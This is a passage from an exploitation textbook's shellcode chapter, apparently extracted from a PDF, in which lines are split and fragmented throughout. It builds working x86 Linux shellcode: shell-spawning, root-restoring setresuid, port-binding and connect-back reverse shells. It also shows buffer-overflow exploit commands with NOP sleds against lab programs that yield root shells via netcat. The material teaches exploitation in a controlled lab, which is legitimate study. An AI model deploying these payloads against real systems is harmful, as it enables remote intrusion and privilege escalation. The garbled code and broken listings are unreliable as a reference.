#0 0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3:
call
0x2c6541b7
0xbffff9a8:
ins
BYTE PTR es:[edi],[dx]
0xbffff9a9:
outs
[dx],DWORD PTR ds:[esi]
0xbffff9aa:
sub
al,0x20
0xbffff9ac:
ja
0xbffffa1d
(gdb) i r eip
eip
0x2c6541b7
0x2c6541b7
(gdb) x/32xb 0xbffff9a3
Sh el lc ode

289

0xbffff9a3:
0xe8
0x0f
0x48
0x65
0xbffff9ab:
0x20
0x77
0x6f
0x72
0xbffff9b3:
0x0d
0x59
0xb8
0x04
0xbffff9bb:
0xcd
0x80
0xb8
0x01
(gdb) quit
root@hacking:/home/reader/booksrc # hexdump -C
00000000 e8 0f 00 00 00 48 65 6c 6c 6f 2c 20
00000010 64 21 0a 0d 59 b8 04 00 00 00 bb 01
00000020 0f 00 00 00 cd 80 b8 01 00 00 00 bb
00000030 cd 80
00000032
root@hacking:/home/reader/booksrc #

0x6c
0x6c
0xbb
0xbb

0x6c
0x64
0x01
0xcd

helloworld1
77 6f 72 6c
00 00 00 ba
00 00 00 00

0x6f
0x21
0xba
0x80

0x2c
0x0a
0x0f
0x00

|
...
Y
...
|
|
...
Since we
are running GDB as root, the
...
The memory where
the shellcode should be is examined
...
At least,
execution was redirected, but something went wrong with the shellcode bytes
...
This, however, totally destroys the
meaning of the machine code
...
Such functions will simply terminate
at the first null byte, producing incomplete and unusable shellcode in memory
...

0x523 Removing Null Bytes
Looking at the disassembly, it is obvious that the first null bytes come from
the call instruction
...
The call instruction allows for much longer jump distances,
290

0x 500

which means that a small value like 19 will have to be padded with leading
zeros resulting in null bytes
...
A
small negative number will have its leading bits turned on, resulting in 0xff
bytes
...

The following revision of the helloworld shellcode uses a standard implementation of this trick: Jump to the end of the shellcode to a call instruction which,
in turn, will jump back to a pop instruction at the beginning of the shellcode
...
s
BITS 32

; Tell nasm this is 32-bit code
...

two:
; ssize_t write(int
pop ecx
mov eax, 4
mov ebx, 1
mov edx, 15
int 0x80

fd, const void *buf, size_t count);
; Pop the return address (string ptr) into ecx
...

; STDOUT file descriptor
; Length of the string
; Do syscall: write(1, string, 14)

; void _exit(int status);
mov eax, 1
; Exit syscall #
mov ebx, 0
; Status = 0
int 0x80
; Do syscall: exit(0)
one:
call two
; Call back upwards to avoid null bytes
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes
...
This solves the
first and most difficult null-byte problem for this shellcode, but there are still
many other null bytes (shown in bold)
...
s
reader@hacking:~/booksrc $ ndisasm -b32 helloworld2
00000000 EB1E
jmp short 0x20
00000002 59
pop ecx
00000003 B804000000
mov eax,0x4
00000008 BB01000000
mov ebx,0x1
0000000D BA0F000000
mov edx,0xf
00000012 CD80
int 0x80
00000014 B801000000
mov eax,0x1
00000019 BB00000000
mov ebx,0x0
0000001E CD80
int 0x80
00000020 E8DDFFFFFF
call 0x2
00000025 48
dec eax
00000026 656C
gs insb
00000028 6C
insb
Sh el lc ode

291

00000029 6F
0000002A 2C20
0000002C 776F
0000002E 726C
00000030 64210A
00000033 0D
reader@hacking:~/booksrc $

outsd
sub al,0x20
ja 0x9d
jc 0x9c
and [fs:edx],ecx
db 0x0D

These remaining null bytes can be eliminated with an understanding of
register widths and addressing
...
This means execution can only jump a maximum of approximately
128 bytes in either direction
...
The
difference between assembled machine code for the two jump varieties is
shown below:
EB 1E

jmp short 0x20

versus
E9 1E 00 00 00

jmp 0x23

The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits
in width
...
These original 16-bit versions
of the registers can still be used for accessing the first 16 bits of each corresponding 32-bit register
...
Naturally,
assembly instructions using the smaller registers only need to specify operands
up to the register’s bit width
...

Machine code

Assembly

B8 04 00 00 00

mov eax,0x4

66 B8 04 00

mov ax,0x4

B0 04

mov al,0x4

Using the AL, BL, CL, or DL register will put the correct least significant
byte into the corresponding extended register without creating any null bytes
in the machine code
...
This is especially true for shellcode, since it will be taking
over another process
...
Here are some more simple assembly
instructions for your arsenal
...

292

0x 500

Instruction

Description

inc

Increment the target operand by adding 1 to it
...

The next few instructions, like the mov instruction, have two operands
...

Instruction

Description

add ,

Add the source operand to the destination operand, storing the result
in the destination
...

or ,

Perform a bitwise or logic operation, comparing each bit of one
operand with the corresponding bit of the other operand
...
The final result is stored in
the destination operand
...

1
1
0
0

or
or
or
or

0
1
1
0

=
=
=
=

0
1
0
0

The result bit is on only if both the source bit and the destination bit
are on
...

xor ,

Perform a bitwise exclusive or (xor) logical operation, comparing each
bit of one operand with the corresponding bit of the other operand
...
The final result is stored in the destination operand
...
Can you think of a way
to optimize this technique? The DWORD value specified in each instruction
Sh el lc ode

293

comprises 80 percent of the code
...
This can be done with a single
two-byte instruction:
29 C0

sub eax,eax

Using the sub instruction will work fine when zeroing registers at the
beginning of shellcode
...
For that reason, there is a preferred twobyte instruction that is used to zero registers in most shellcode
...
Since 1 xored
with 1 results in a 0, and 0 xored with 0 results in a 0, any value xored with itself
will result in 0
...

31 C0

xor eax,eax

You can safely use the sub instruction to zero registers (if done at the
beginning of the shellcode), but the xor instruction is most commonly used
in shellcode in the wild
...
The inc and dec
instructions have also been used when possible to make for even smaller
shellcode
...
s
BITS 32

; Tell nasm this is 32-bit code
...

two:
; ssize_t write(int
pop ecx
xor eax, eax
mov al, 4
xor ebx, ebx
inc ebx
xor edx, edx
mov dl, 15
int 0x80

fd, const void *buf, size_t count);
; Pop the return address (string ptr) into ecx
...

; Write syscall #4 to the low byte of eax
...

; Increment ebx to 1, STDOUT file descriptor
...

dec ebx
; Decrement ebx back down to 0 for status = 0
...

294

0x 500

After assembling this shellcode, hexdump and grep are used to quickly
check it for null bytes
...
s
$ hexdump -C helloworld3 | grep --color=auto 00
b0 04 31 db 43 31 d2 b2 0f cd 80 |
...
1
...
|
e8 e8 ff ff ff 48 65 6c 6c 6f 2c |
...
Hello,|
64 21 0a 0d
| world!
...
When
used with an exploit, the notesearch program is coerced into greeting the
world like a newbie
...
/getenvaddr SHELLCODE
...
/notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]------Hello, world!
reader@hacking :~/booksrc $

0x530 Shell-Spawning Shellcode
Now that you’ve learned how to make system calls and avoid null bytes, all
sorts of shellcodes can be constructed
...
System call number 11,
execve(), is similar to the C execute() function that we used in the previous
chapters
...
h>
int execve(const char *filename, char *const argv[],
char *const envp[]);
DESCRIPTION
execve() executes the program pointed to by filename
...
In the latter case, the interpreter must
be a valid pathname for an executable which is not itself a script,
which will be invoked as interpreter [arg] filename
...
envp
is an array of strings, conventionally of the form key=value, which are
Sh el lc ode

295

passed as environment to the new program
...
The argument vector and environment can
be accessed by the called program's main function, when it is defined
as int main(int argc, char *argv[], char *envp[])
...
The environment array—

the third argument—can be empty, but it still need to be terminated with a
32-bit null pointer
...
Done in C, a program
making this call would look like this:
exec_shell
...
h>
int main() {
char filename[] = "/bin/sh\x00";
char **argv, **envp; // Arrays that contain char pointers
argv[0] = filename; // The only argument is filename
...

envp[0] = 0; // Null terminate the environment array
...
In addition, the "/bin/sh" string needs to be terminated with
a null byte
...
Dealing with memory in
assembly is similar to using pointers in C
...

Instruction

Description

lea ,

Load the effective address of the source operand into the destination
operand
...
For example, the following instruction
in assembly will treat EBX+12 as a pointer and write eax to where it’s pointing
...
The environment array is collapsed into the end of
the argument array, so they share the same 32-bit null terminator
...
s
BITS 32
jmp
one:
; int
pop
xor
mov
mov
mov
lea
lea
mov
int

short two

; Jump down to the bottom for the call trick
...

eax, eax
; Put 0 into eax
...

[ebx+8], ebx ; Put addr from ebx where the AAAA is
...

ecx, [ebx+8] ; Load the address of [ebx+8] into ecx for argv ptr
...

al, 11
; Syscall #11
0x80
; Do it
...

db '/bin/shXAAAABBBB'
; The XAAAABBBB bytes aren't needed
...
Loading the effective address of a bracketed
register added to a value is an efficient way to add the value to the register
and store the result in another register
...

Loading the address of a dereferenced pointer produces the original pointer,
so this instruction puts EBX+8 into EDX
...
When assembled, this shellcode is devoid of null
bytes
...

reader@hacking:~/booksrc $ nasm exec_shell
...
/getenvaddr SHELLCODE
SHELLCODE will be at 0xbffff9c0
reader@hacking:~/booksrc $
...
[1
...
C
...
S
...
/notesearch
'print "\xc0\xf9\xff\xbf"x40')

Sh el lc ode

297

sh-3
...
2#

This shellcode, however, can be shortened to less than the current
45 bytes
...
The smaller the shellcode, the more situations it can be used
in
...

reader@hacking:~/booksrc/shellcodes $
00000000 eb 16 5b 31 c0 88 43 07 89
00000010 08 8d 53 0c b0 0b cd 80 e8
00000020 6e 2f 73 68
00000024
reader@hacking:~/booksrc/shellcodes $
36 exec_shell
reader@hacking:~/booksrc/shellcodes $

hexdump -C exec_shell
5b 08 89 43 0c 8d 4b |
...
C
...
K|
e5 ff ff ff 2f 62 69 |
...
/bi|
|n/sh|
wc -c exec_shell

This shellcode can be shrunk down further by redesigning it and using
registers more efficiently
...
When a value is pushed to the stack, ESP is moved up in
memory (by subtracting 4) and the value is placed at the top of the stack
...

The following shellcode uses push instructions to build the necessary
structures in memory for the execve() system call
...
s
BITS 32
; execve(const char
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80

*filename, char *const argv [], char *const envp[])
; Zero out eax
...

; Push "//sh" to the stack
...

; Put the address of "/bin//sh" into ebx, via esp
...

; This is an empty array for envp
...

; This is the argv array with string ptr
...

; Do it
...
The extra backslash doesn’t matter and
is effectively ignored
...
The resulting shellcode still spawns a shell but is only
25 bytes, compared to 36 bytes using the jmp call method
...
s
reader@hacking:~/booksrc $ wc -c tiny_shell
25 tiny_shell
reader@hacking:~/booksrc $ hexdump -C tiny_shell
00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e
00000010 89 e2 53 89 e1 b0 0b cd 80
00000019
reader@hacking:~/booksrc $ export SHELLCODE=$(cat
reader@hacking:~/booksrc $
...
/notesearch $(perl -e
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]------sh-3
...
Ph//shh/bin
...
S
...
/notesearch
'print "\xcb\xf9\xff\xbf"x40')

0x531 A Matter of Privilege
To help mitigate rampant privilege escalation, some privileged processes will
lower their effective privileges while doing things that don’t require that kind
of access
...
By changing the effective user ID, the privileges of the process
can be changed
...

SETEGID(2)

Linux Programmer's Manual

SETEGID(2)

NAME
seteuid, setegid - set effective user or group ID
SYNOPSIS
#include ...
h>
int seteuid(uid_t euid);
int setegid(gid_t egid);
DESCRIPTION
seteuid() sets the effective user ID of the current process
...

Precisely the same holds for setegid() with "group" instead of "user"
...
On error, -1 is returned, and errno is
set appropriately
...

Sh el lc ode

299

drop_privs
...
h>
void lowered_privilege_function(unsigned char *ptr) {
char buffer[50];
seteuid(5); // Drop privileges to games user
...
This only
spawns a shell for the games user, without root access
...
c
reader@hacking:~/booksrc $ sudo chown root
...
/drop_privs
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $
...
/drop_privs
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $
...
2$ whoami
games
sh-3
...
2$

Fortunately, the privileges can easily be restored at the beginning of our
shellcode with a system call to set the privileges back to root
...
The system call number and manual page are
shown below
...
h
#define __NR_setresuid
164
#define __NR_setresuid32
208
reader@hacking:~/booksrc $ man 2 setresuid
SETRESUID(2)
Linux Programmer's Manual
SETRESUID(2)
NAME
setresuid, setresgid - set real, effective and saved user or group ID
SYNOPSIS
#define _GNU_SOURCE
#include ...

The following shellcode makes a call to setresuid() before spawning the
shell to restore root privileges
...
s
BITS 32
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax
; Zero out eax
...

xor ecx, ecx
; Zero out ecx
...

mov al, 0xa4
; 164 (0xa4) for syscall #164
int 0x80
; setresuid(0, 0, 0) Restore all root privs
...

; syscall #11
; push some nulls for string termination
...

; push "/bin" to the stack
...

; push 32-bit null terminator to stack
...

; push string addr to stack above null terminator
...

; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This way, even if a program is running under lowered privileges when it’s
exploited, the shellcode can restore the privileges
...

reader@hacking:~/booksrc $ nasm priv_shell
...
/getenvaddr SHELLCODE
...
/drop_privs $(perl -e 'print "\xbf\xf9\xff\xbf"x40')
sh-3
...
2# id
uid=0(root) gid=999(reader)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scan
ner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3
...
There is a single-byte
x86 instruction called cdq , which stands for convert doubleword to quadword
...
Since
the registers are 32-bit doublewords, it takes two registers to store a 64-bit
quadword
...
Operationally, this means if the sign bit of EAX
is 0, the cdq instruction will zero the EDX register
...
Since the stack is
32-bit aligned, a single byte value pushed to the stack will be aligned as a
doubleword
...
The instructions that push a single byte and pop it back
into a register take three bytes, while using xor to zero the register and moving
a single byte takes four bytes
31 C0
B0 0B

xor eax,eax
mov al,0xb

compared to
6A 0B
58

push byte +0xb
pop eax

These tricks (shown in bold) are used in the following shellcode listing
...

shellcode
...

xor ebx, ebx
; Zero out ebx
...

cdq
; Zero out edx using the sign bit from eax
...

; execve(const char *filename, char *const argv [], char *const envp[])

302

0x 500

push BYTE 11
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 0x80

;
;
;
;
;
;
;
;
;
;
;

push 11 to the stack
...

push some nulls for string termination
...

push "/bin" to the stack
...

push 32-bit null terminator to stack
...

push string addr to stack above null terminator
...

execve("/bin//sh", ["/bin//sh", NULL], [NULL])

The syntax for pushing a single byte requires the size to be declared
...

These sizes can be implied from register widths, so moving into the AL
register implies the BYTE size
...

0x540 Port-Binding Shellcode
When exploiting a remote program, the shellcode we’ve designed so far won’t
work
...
Port-binding shellcode will bind the shell
to a network port where it listens for incoming connections
...
The
following C code binds to port 31337 and listens for a TCP connection
...
c
#include
#include
#include
#include
#include

...
h>
...
h>
...
sin_family = AF_INET;
host_addr
...
sin_addr
...
sin_zero), '\0', 8);

//
//
//
//

Host byte order
Short, network byte order
Automatically fill with my IP
...

bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
listen(sockfd, 4);

Sh el lc ode

303

sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
}

These familiar socket functions can all be accessed with a single Linux
system call, aptly named socketcall()
...

reader@hacking:~/booksrc $ grep socketcall /usr/include/asm-i386/unistd
...
call
determines which socket function to invoke
...

User programs should call the appropriate functions by their usual
names
...

The possible call numbers for the first argument are listed in the
linux/net
...

From /usr/include/linux/net
...
The calls are simple enough, but some of them
require a sockaddr structure, which must be built by the shellcode
...

reader@hacking:~/booksrc $ gcc -g bind_port
...
/a
...
so
...

(gdb) list 18
13
sockfd = socket(PF_INET, SOCK_STREAM, 0);
14
15
host_addr
...
sin_port = htons(31337);
// Short, network byte order
17
host_addr
...
s_addr = INADDR_ANY; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...
c, line 13
...
c, line 20
...
out
Breakpoint 1, main () at bind_port
...
All three arguments are
pushed to the stack (but with mov instructions) in reverse order
...

(gdb) cont
Continuing
...
c:20
20
bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
(gdb) print host_addr
$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0},
sin_zero = "\000\000\000\000\000\000\000"}
(gdb) print sizeof(struct sockaddr)

Sh el lc ode

305

$2 = 16
(gdb) x/16xb &host_addr
0xbffff780:
0x02
0x00
0xbffff788:
0x00
0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(gdb)

0x7a
0x00

0x69
0x00

0x00
0x00

0x00
0x00

0x00
0x00

0x00
0x00

The next breakpoint happens after the sockaddr structure is filled with
values
...
The sin_family and sin_port elements are
both words, followed by the address as a DWORD
...
The remaining eight bytes
after that are just extra space in the structure
...

The following assembly instructions perform all the socket calls needed
to bind to port 31337 and accept TCP connections
...
The last eight bytes of the sockaddr
structure aren’t actually pushed to the stack, since they aren’t used
...

bind_port
...

pop eax
cdq
; Zero out edx for use as a null DWORD later
...

inc ebx
; 1 = SYS_SOCKET = socket()
push edx
; Build arg array: { protocol = 0,
push BYTE 0x1
;
(in reverse)
SOCK_STREAM = 1,
push BYTE 0x2
;
AF_INET = 2 }
mov ecx, esp
; ecx = ptr to argument array
int 0x80
; After syscall, eax has socket file descriptor
...

When a connection is accepted, the new socket file descriptor is put into EAX
at the end of this code
...
Fortunately, standard file descriptors make this fusion remarkably simple
...
Sockets, too, are
just file descriptors that can be read from and written to
...
There is a system call
specifically for duplicating file descriptors, called dup2
...

reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd
...
h>

Sh el lc ode

307

int dup(int oldfd);
int dup2(int oldfd, int newfd);
DESCRIPTION
dup() and dup2() create a copy of the file descriptor oldfd
...

The bind_port
...
The following instructions are added in the file bind_shell_beta
...
The spawned
shell’s standard input and output file descriptors will be the TCP connection,
allowing remote shell access
...
s
; dup2(connected socket, {all three standard I/O file descriptors})
mov ebx, eax
; Move socket FD in ebx
...

; push "//sh" to the stack
...

; Put the address of "/bin//sh" into ebx via esp
...

; This is an empty array for envp
...

; This is the argv array with string ptr
...
In the output below, grep
is used to quickly check for null bytes
...

reader@hacking:~/booksrc
reader@hacking:~/booksrc
00000000 6a 66 58 99 31
00000010 89 c6 6a 66 58
00000020 10 51 56 89 e1

308

0x 500

$ nasm bind_shell_beta
...
1
...
j
...
jfXCRfhzifS
...
QV
...
|

00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3
00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 3f 41 cd
00000050 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3
00000060 53 89 e1 cd 80
00000065
reader@hacking:~/booksrc $ export SHELLCODE=$(cat
reader@hacking:~/booksrc $
...
/notesearch $(perl -e
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------

6a 3f 58 |
...
j?X|
80 b0 0b |1
...
?A
...
R
...
|
bind_shell_beta)

...
Then, netcat is used to connect to the root shell on that port
...
0
...
1 31337
localhost [127
...
0
...
With control structures, the repeated calls to dup2 could be
shrunk down to a single call in a loop
...
Disassembling the main
function will show us how the compiler implemented the for loop using assembly instructions
...

This variable is referenced in relation to the EBP register as [ebp-4]
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

(gdb)

lea
inc
jmp
leave
ret

eax,[ebp-4]
DWORD PTR [eax]
0x804838b

The loop contains two new instructions: cmp (compare) and jle (jump if
less than or equal to), the latter belonging to the family of conditional jump
instructions
...
Then, a conditional jump instruction will jump based on
the flags
...
Otherwise, the
next jmp instruction brings execution to the end of the function at 0x080483a6,
exiting the loop
...
Using conditional jump instructions, complex
programming control structures such as loops can be created in assembly
...

Instruction

Description

cmp ,

Compare the destination operand with the source, setting flags for use
with a conditional jump instruction
...

jne

Jump if not equal
...

jle

Jump if less than or equal to
...

jnle

Jump if not less than or equal to
...

jng

jnge

Jump if not greater than, or not greater than or equal to
...

xor eax, eax
; Zero eax
...

jle dup_loop
; If ecx <= 2, jump to dup_loop
...
With
a more complete understanding of the flags used by the cmp instruction, this
loop can be shrunk even further
...
These flags are carry flag (CF), parity flag (PF), adjust flag (AF), overflow flag (OF), zero flag (ZF), and sign flag (SF)
...
The zero flag is set to true if the
result is zero, otherwise it is false
...

This means that, after any instruction with a negative result, the sign flag
becomes true and the zero flag becomes false
...

SF

sign flag

True if the result is negative (equal to the most significant bit of result)
...
The jle (jump if
less than or equal to) instruction is actually checking the zero and sign flags
...
The other conditional jump instructions work in a similar way, and there are still more conditional jump
instructions that directly check individual status flags:
Instruction

Description

jz

Jump to target if the zero flag is set
...

js

Jump if the sign flag is set
...

With this knowledge, the cmp (compare) instruction can be removed
entirely if the loop’s order is reversed
...
The shortened loop is shown
below, with the changes shown in bold
...

xor eax, eax
; Zero eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80
; dup2(c, 0)
dec ecx
; Count down to 0
...

Sh el lc ode

311

The first two instructions before the loop can be shortened with the xchg
(exchange) instruction
...

This single instruction can replace both of the following instructions,
which take up four bytes:
89 C3
31 C0

mov ebx,eax
xor eax,eax

The EAX register needs to be zeroed to clear only the upper three bytes
of the register, and EBX already has these upper bytes cleared
...
Naturally, this
only works in situations where the source operand’s register doesn’t matter
...

bind_shell
...

pop eax
cdq
; Zero out edx for use as a null DWORD later
...

inc ebx
; 1 = SYS_SOCKET = socket()
push edx
; Build arg array: { protocol = 0,
push BYTE 0x1
;
(in reverse)
SOCK_STREAM = 1,
push BYTE 0x2
;
AF_INET = 2 }
mov ecx, esp
; ecx = ptr to argument array
int 0x80
; After syscall, eax has socket file descriptor
...

; bind(s, [2, 31337, 0], 16)
push BYTE 0x66
; socketcall (syscall #102)
pop eax
inc ebx
; ebx = 2 = SYS_BIND = bind()

312

0x 500

push edx
push WORD 0x697a
push WORD bx
mov ecx, esp
push BYTE 16
push ecx
push esi
mov ecx, esp
int 0x80

;
;
;
;
;
;
;
;
;

Build sockaddr struct:
(in reverse order)
ecx =
argv:

ecx =
eax =

INADDR_ANY = 0
PORT = 31337
AF_INET = 2
server struct pointer
{ sizeof(server struct) = 16,
server struct pointer,
socket file descriptor }
argument array
0 on success

; listen(s, 0)
mov BYTE al, 0x66 ; socketcall (syscall #102)
inc ebx
inc ebx
; ebx = 4 = SYS_LISTEN = listen()
push ebx
; argv: { backlog = 4,
push esi
;
socket fd }
mov ecx, esp
; ecx = argument array
int 0x80
; c = accept(s, 0, 0)
mov BYTE al, 0x66 ;
inc ebx
;
push edx
;
push edx
;
push esi
;
mov ecx, esp
;
int 0x80
;

socketcall (syscall #102)
ebx = 5 = SYS_ACCEPT = accept()
argv: { socklen = 0,
sockaddr ptr = NULL,
socket fd }
ecx = argument array
eax = connected socket FD

; dup2(connected socket, {all three standard I/O file descriptors})
xchg eax, ebx
; Put socket FD in ebx and 0x00000005 in eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80
; dup2(c, 0)
dec ecx
; count down to 0
jns dup_loop
; If the sign flag is not set, ecx is not negative
...

; push "//sh" to the stack
...

; Put the address of "/bin//sh" into ebx via esp
...

; This is an empty array for envp
...

; This is the argv array with string ptr
; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This assembles to the same 92-byte bind_shell shellcode used in the
previous chapter
...
s
$ hexdump -C bind_shell
db 43 52 6a 01 6a 02 89
52 66 68 7a 69 66 53 89
80 b0 66 43 43 53 56 89
56 89 e1 cd 80 93 6a 02
b0 0b 52 68 2f 2f 73 68
89 e2 53 89 e1 cd 80

e1
e1
e1
59
68

cd
6a
cd
b0
2f

80
10
80
3f
62

|jfX
...
CRj
...
|
|
...
j
...
fCCSV
...
fCRRV
...
Y
...
Iy
...
R
...
|

$ diff bind_shell portbinding_shellcode

0x550 Connect-Back Shellcode
Port-binding shellcode is easily foiled by firewalls
...
This limits
the user’s exposure and will prevent port-binding shellcode from receiving a
connection
...

However, firewalls typically do not filter outbound connections, since that
would hinder usability
...
This means that if
the shellcode initiates the outbound connection, most firewalls will allow it
...
Opening a
TCP connection only requires a call to socket() and a call to connect()
...
The following
connect-back shellcode was made from the bind-port shellcode with a few
modifications (shown in bold)
...
s
BITS 32
; s = socket(2, 1, 0)
push BYTE 0x66
; socketcall is syscall #102 (0x66)
...

xor ebx, ebx
; ebx is the type of socketcall
...

xchg esi, eax

; Save socket FD in esi for later
...
168
...
72
push WORD 0x697a ;
(in reverse order)
PORT = 31337
push WORD bx
;
AF_INET = 2
mov ecx, esp
; ecx = server struct pointer
push BYTE 16
; argv: { sizeof(server struct) = 16,
push ecx
;
server struct pointer,
push esi
;
socket file descriptor }
mov ecx, esp
; ecx = argument array
inc ebx
; ebx = 3 = SYS_CONNECT = connect()
int 0x80
; eax = connected socket FD
; dup2(connected socket, {all three standard I/O file descriptors})
xchg eax, ebx
; Put socket FD in ebx and 0x00000003 in eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80
; dup2(c, 0)
dec ecx
; Count down to 0
...

; execve(const char
mov BYTE al, 11
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push edx
mov edx, esp
push ebx
mov ecx, esp
int 0x80

*filename, char *const argv [], char *const envp[])
; execve syscall #11
...

; push "//sh" to the stack
...

; Put the address of "/bin//sh" into ebx via esp
...

; This is an empty array for envp
...

; This is the argv array with string ptr
...
168
...
72,
which should be the IP address of the attacking machine
...
This is made clear when each number is displayed
in hexadecimal:
reader@hacking:~/booksrc $ gdb -q
(gdb) p /x 192
$1 = 0xc0
(gdb) p /x 168
$2 = 0xa8
(gdb) p /x 42
$3 = 0x2a
(gdb) p /x 72
$4 = 0x48
(gdb) p /x 31337
$5 = 0x7a69
(gdb)

Sh el lc ode

315

Since these values are stored in network byte order but the x86 architecture is in little-endian order, the stored DWORD seems to be reversed
...
168
...
72 is 0x482aa8c0
...
When the port number 31337
is printed in hexadecimal using gdb, the byte order is shown in little-endian
order
...

The netcat program can also be used to listen for incoming connections
with the -l command-line option
...
The ifconfig command ensures
the IP address of eth0 is 192
...
42
...

reader@hacking:~/booksrc $ sudo ifconfig eth0 192
...
42
...
168
...
72 Bcast:192
...
42
...
255
...
0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0
...
0 b)
Interrupt:16
reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337
...
From working with this program before, we know that the
request buffer is 500 bytes long and is located at 0xbffff5c0 in stack memory
...

reader@hacking:~/booksrc
reader@hacking:~/booksrc
00000000 6a 66 58 99 31
00000010 96 6a 66 58 43
00000020 89 e1 6a 10 51
00000030 b0 3f cd 80 49
00000040 2f 62 69 6e 89
0000004e
reader@hacking:~/booksrc
78 connectback_shell
reader@hacking:~/booksrc
402
reader@hacking:~/booksrc
$1 = 0xbffff688
reader@hacking:~/booksrc

$ nasm connectback_shell
...
1
...
j
...
jfXCh
...
j
...
C
...
Iy
...
R
...
|

$ wc -c connectback_shell
$ echo $(( 544 - (4*16) - 78 ))
$ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"
$

Since the offset from the beginning of the buffer to the return address is
540 bytes, a total of 544 bytes must be written to overwrite the four-byte return
address
...
To ensure proper alignment, the sum
of the NOP sled and shellcode bytes must be divisible by four
...
These are
the bounds of the response buffer, and the memory afterward corresponds
to other values on the stack that might be written to before we change the
program’s control flow
...
Repeating the
return address 16 times will generate 64 bytes, which can be put at the end of
the 544-byte exploit buffer and keeps the shellcode safely within the bounds
of the buffer
...
The calculations above show that a 402-byte NOP sled will
properly align the 78-byte shellcode and place it safely within the bounds of
the buffer
...
Overwriting the return address with 0xbffff688 should return
execution right to the middle of the NOP sled, while avoiding bytes near the
beginning of the buffer, which might get mangled
...
In the output below, netcat is used to listen
for incoming connections on port 31337
...

Now, in another terminal, the calculated exploit values can be used to
exploit the tinyweb program remotely
...
"\r\n"') | nc -v 127
...
0
...
0
...
1] 80 (www) open

Back in the original terminal, the shellcode has connected back to
the netcat process listening on port 31337
...

reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337
...
168
...
72] from hacking
...
168
...
72] 34391
whoami
root

The network configuration for this example is slightly confusing
because the attack is directed at 127
...
0
...
168
...
72
...
168
...
72 is easier to use in shellcode than 127
...
0
...
Since the loopback
address contains two null bytes, the address must be built on the stack with
Sh el lc ode

317

multiple instructions
...
The file loopback_shell
...
s that uses the loopback address of 127
...
0
...

The differences are shown in the following output
...
s loopback_shell
...
168
...
72
-->
push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127
...
0
...
By writing a two-byte WORD of null bytes
at ESP+1, the middle two bytes will be overwritten to form the correct return
address
...
These calculations are shown in the output below, and they result in
a 397-byte NOP sled
...

reader@hacking:~/booksrc $ nasm loopback_shell
...
1
...
j
...
jfXCh
...
T$
...
j
...
C
...
I
...
Rh|
00000040 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 53 89 |//shh/bin
...
S
...
|
00000053
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))
397
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print "\x88\
xf6\xff\xbf"x16
...
0
...
1 80
localhost [127
...
0
...

reader@hacking:~ $ nc -vlp 31337
listening on [any] 31337
...
0
...
1] from localhost [127
...
0
...
The only reason these frogs have such
an amazingly powerful defense is that a certain species
of snake kept eating them and developing a resistance
...
One result of this co-evolution is that the frogs are safe against all
other predators
...
Their
exploit techniques have been around for years, so it’s only natural that
defensive countermeasures would develop
...

This cycle of innovation is actually quite beneficial
...
Worms replicate by
exploiting existing vulnerabilities in flawed software
...
As with chickenpox, it’s better to suffer a

minor outbreak early instead of years later when it can cause real damage
...
In this way, worms
and viruses can actually strengthen security in the long run
...
Defensive countermeasures
